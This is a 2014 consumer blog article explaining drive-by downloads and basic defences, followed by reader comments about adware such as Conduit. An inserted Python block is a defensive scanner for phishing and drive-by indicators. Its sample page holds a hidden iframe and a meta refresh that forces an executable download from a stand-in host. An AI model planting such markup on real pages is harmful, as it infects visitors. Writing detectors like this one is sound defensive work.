Drive-by Download Dangers
The term “drive-by download” is often encountered in security bulletins and the media reports they inspire. What, exactly, is a drive-by download? Who is vulnerable to it? And how can you protect yourself against drive-by downloads? Read on for answers...
What is a Drive-by Download?
The use of the term “drive-by” conjures up images of innocent victims catching bullets fired from a moving car, with the added pathos of injury caused by a bad guy who was aiming at someone else. The insinuation is that the victim totally didn’t deserve to get shot and is completely blameless for getting hit. Sometimes that is true in the case of drive-by downloads, but not always.
There are two types of “drive-by downloads.” Both refer to an unintentional downloading of malicious software from a website. In the first type, the victim knows he is downloading something but does not know or understand the consequences of doing so. In the second type, a file is downloaded to the victim’s machine without his or her knowledge or consent.
Everyone who surfs the Web is potentially vulnerable to drive-by downloads. They can also be triggered by viewing an email which entices users to click a link to a malicious website.
Malicious software can be cloaked in sheep’s clothing, purporting to be a desirable app that most people will want to download and install. It might even be represented as an anti-malware app; irony aside, what better way to get a victim to lower his or her defenses than by saying, “Disable any existing security software you may have running to avoid conflicts with this anti-malware app?”
Surreptitious downloads give victims no warning that anything is being installed; just loading a Web page in one’s browser or opening an HTML email can (under certain circumstances) trigger hidden code that starts the downloading and installation. Those "certain circumstances" almost always involve vulnerable (unpatched) application software, security software that's outdated, or computers that lack the latest operating system security patches. In some rare cases, a new exploit may slip past even the best defenses and trigger a malicious drive-by download. (See How I Got Hacked... And Why You MUST Have a Backup! and Avoiding Zero-Day Exploits.)
Protection From Drive-By Downloads
Protection against drive-by downloads starts with awareness and appropriate caution. If you know that any software can be malware in disguise, it’s best to stick to downloading apps from sources you have reason to trust. (See Downloading? Watch Out For These Danger Signs.) Don't click links in emails unless you're 100% sure you know where that link will lead. Even if the email appears to be from a friend or a company with which you do business, it could be spoofed. Use a bookmark, type the website address manually, or check with the sender to make sure they really did send it.
Your next step is to make sure that all the software on your computer is up to date with the latest patches and fixes. Using Windows Update will keep you current with the latest Windows security patches from Microsoft. But you've also got third-party software on your computer that can be an attack vector. See Computer Security: The Missing Link to learn how to address the problem.
And of course, anti-malware protection is a must. My article Free Anti-Virus Programs will hook you up with some of the best Internet security software, and save you money in the process.
Protection is also built into most modern browsers. Some techniques rely on crowd-sourced databases of known “rogue” websites from which others have received drive-by downloads. Others rely on closely monitoring the behavior of Web pages or emails for signs that they are trying to download or install something, blocking the suspicious behavior, and notifying you so that you can deny or authorize the suspicious action.
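The behavior-monitoring idea above, and the spoofed-link warning in the section before it, can be illustrated with a small static checker. This is an added example, not code from the article or from any browser; it uses only the Python standard library and a constructed sample page, and it flags three cheap indicators: a link whose visible text names one host while its href goes elsewhere, a zero-size iframe, and a meta refresh that points at an executable file.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# File extensions a browser hands straight to the OS or a script host.
EXEC_EXT = re.compile(r"\.(exe|msi|scr|bat|cmd|js|jar|hta)(\?|$)", re.I)
HOSTLIKE = re.compile(r"\b[\w-]+(\.[\w-]+)*\.[a-zA-Z]{2,}\b")  # host name in link text

class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._href = None  # href of the <a> currently open, if any
        self._text = ""    # visible text accumulated inside that <a>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"):
            self.findings.append(f"hidden iframe loads {a.get('src')}")
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            content = a.get("content") or ""
            if EXEC_EXT.search(content):
                self.findings.append(f"meta refresh to executable: {content}")
        elif tag == "a":
            self._href, self._text = a.get("href") or "", ""

    def handle_data(self, data):
        if self._href is not None:
            self._text += data

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            shown = HOSTLIKE.search(self._text)
            real = (urlparse(self._href).hostname or "").lower()
            # Compare the last two labels so www.x.com vs login.x.com is not flagged.
            if shown and shown.group(0).lower().split(".")[-2:] != real.split(".")[-2:]:
                self.findings.append(f"link text says {shown.group(0)} but goes to {real}")
            self._href = None

def scan(html):
    p = DriveByScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample: a spoofed link, a 0x0 iframe and a meta refresh to an executable.
SAMPLE = """<p>Account alert: <a href="http://203.0.113.7/login">www.example-bank.com</a></p>
<iframe src="http://198.51.100.9/x.html" width="0" height="0"></iframe>
<meta http-equiv="refresh" content="0;url=http://198.51.100.9/update.exe">"""
```

A zero-size frame is only one way to hide content; real browser protections also inspect CSS and elements created by scripts at run time, which a static parser like this never sees.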
The Devil You Know, or the Devil You Don't Know?
Any site can be invaded by hackers who install hidden code that triggers a drive-by download when visitors view the site’s pages. And it's not just the sketchy or "adult" sites that are likely to harbor malware. One study showed that users are more likely to catch a drive-by download from a religious site than from a p**n site. The reason is that most religious (as well as non-commercial, hobby or personal) sites don’t have much money to spend on security, or lack the technical skills to protect their servers.
Bottom line, be careful what and where you download. Be extra careful and attentive when it comes to links in emails. Keep your application and system software up to date, and use at least one layer of anti-malware protection. I can't promise that will protect you from every conceivable present and future attack, but that's the best set of defenses available now.
Have you been hit with a drive-by download? Your thoughts on this topic are welcome. Post your comment or question below...
This article was posted by Bob Rankin on 28 Apr 2014
Copyright © 2005 - Bob Rankin - All Rights Reserved
Most recent comments on "Drive-by Download Dangers"
28 Apr 2014
I don't think updating Windows will do me any good on my Mac.
EDITOR'S NOTE: Well, you CAN run Windows on an Intel-powered Mac computer. :-)
28 Apr 2014
"Conduit" gave me lots of grief. It hijacked my browser and directed it to their preferred sites. I had to edit the registry to completely rid my computer of this very invasive malware. The "free" Conduit program should be avoided completely.
28 Apr 2014
Several times I have downloaded Torrents and Programs (Zipped) that contain multiple files.
After downloading, I opened the items and found files missing. Shortly after that my AV reports quarantine of Trojans, etc.
Yes, my system has been hijacked by Conduit and some others. A lot of time put in investigating and removing this S**t!
Just Backup, Backup, Backup! This issue will not be going away anytime soon.
My $0.02 CDN
28 Apr 2014
Thank goodness ... I was not the only person "plagued" by the Conduit mess and invasion!!! The ONLY reason I got my Conduit mess was "trusting" CNET Download!!!
I did not authorize it, nor did I know that it was being installed on my computer. What has made me still so mad is that CNET used to be one of the most reliable download sources around ... NOT any more.
I "listen" to what my Avast! Internet Security and Malwarebytes Premium tell me about safe websites or "bad" ones. The problem with both of those programs and most others out there ... The websites are "judged" mostly by humans, not scanning software.
I used to use WOB, years ago ... until I found out that the only "score" a website was given was by people, which meant that the Bad Guys could easily be giving "good, high scores" so that they could continue to do their dirty deeds. CNET's website is considered "safe", since most of the website is fine for reading articles and just looking over the website. The problem begins when you go to download something. CNET has made it a major hassle to do a simple download, for a long, long time. All sorts of Ads pop up and get in your way to do a simple download. I now understand their method. Confuse the masses, so that we can "install" Foistware on you, at your peril!!! Not this kid ... No, no, no! I have moved on and now refuse to use CNET anything!
Awareness is a good thing and makes for some smart decisions. :)
29 Apr 2014
Bob has previously written about, in essence, what a turn for the worse CNET chose. Yes, at one time, many years ago, it was the place to go, but apparently they lost sight of their consumers. As techno-savvy as most of the CNET writers are and their staff tech writers, I can't help but wonder how many of the long-term crowd of writers and techies have abandoned ship. I would today be embarrassed to say I "work" for CNET. As with much of the way with life, really good things go bad when corporate panders to its investors and dollars and kicks the consumer to the curb! I can't count the number of times I've had to help people get rid of Conduit. Thank heaven there are a few great uninstaller programs that can erase all traces of it, including in the registry. It's just time consuming because pieces of Conduit hide in many corners of your computer, such as "hidden files", and you have to go on a hunting exhibition to force uninstall every remnant. CNET has been blasted about this practice of making what you want to download harder as well as adding other programs to the one you were seeking. The bottom line is they won't get the message until people halt using their site. Until then, they will continue to continue and blame the user. BTW, there are other sites that used to be well respected for not giving you a "driveby", but more and more, the legitimacy is falling to the wayside. I no longer use an intermediary service for a download, but go directly to the site of the software company itself and download it from there. I actually did this when I used to hear about something on CNET and they had a direct link to the software maker's site. Lesson: "Convenience can be harmful to your emotional health as well as your computer".
30 Apr 2014
Great article, BOB. Thank you!
I regularly back up with a ClickFree device, and scan with Advanced Systems Care 6, which also keeps me running fast.
Sticking with XP, but I'm prepared to reformat if I have a problem and a destructive restore doesn't work.
30 Apr 2014
I have to echo the comments made about CNET. Once upon a time they were a very good resource for getting quality downloads of freeware; in fact I used to tell my friends and family to use them. Unfortunately several years back I heard a rather disturbing story about someone that got some nasty malware on their system from something they downloaded from CNET. When I investigated, I found this to be true and have since stopped using their site and no longer recommend it to anyone. I actually warn people against using it in fact. As long as it is profitable for CNET to make money from these malware companies they will never go back to being a reputable place to download from. I constantly hammer my friends to be careful and cognizant of what they are doing and don't just hit "continue" without reading what you are doing. Although you don't have to read every word of an agreement (but you should at least understand what it says), at least read what it is that you are downloading and remove all the extra check marks "for other things you may want" because they are rarely ever anything you really want or need.
04 May 2014
For the tech savvy I recommend the software Free Fixer, which does a diagnostic of your computer informing you of the good and bad files you have on your computer system.
You see a file you believe has gone rogue . . . you simply delete it!
In order for this application to be successful though one should basically know to distinguish between files.
You can download the Free or Paid version of this amazing software at www.freefixer.com
(I recently spoke to the creator of FF, a Mr. Roger, who informed me that a better model will be coming out in the future. I cannot wait for that version!)
Note: I am not an employee of Free Fixer nor am I a compensated spokesperson for same. I simply believe in this software as it once saved my computer system from complete annihilation from a particularly pernicious rootkit I once encountered on my computer system made possible via a drive-by download!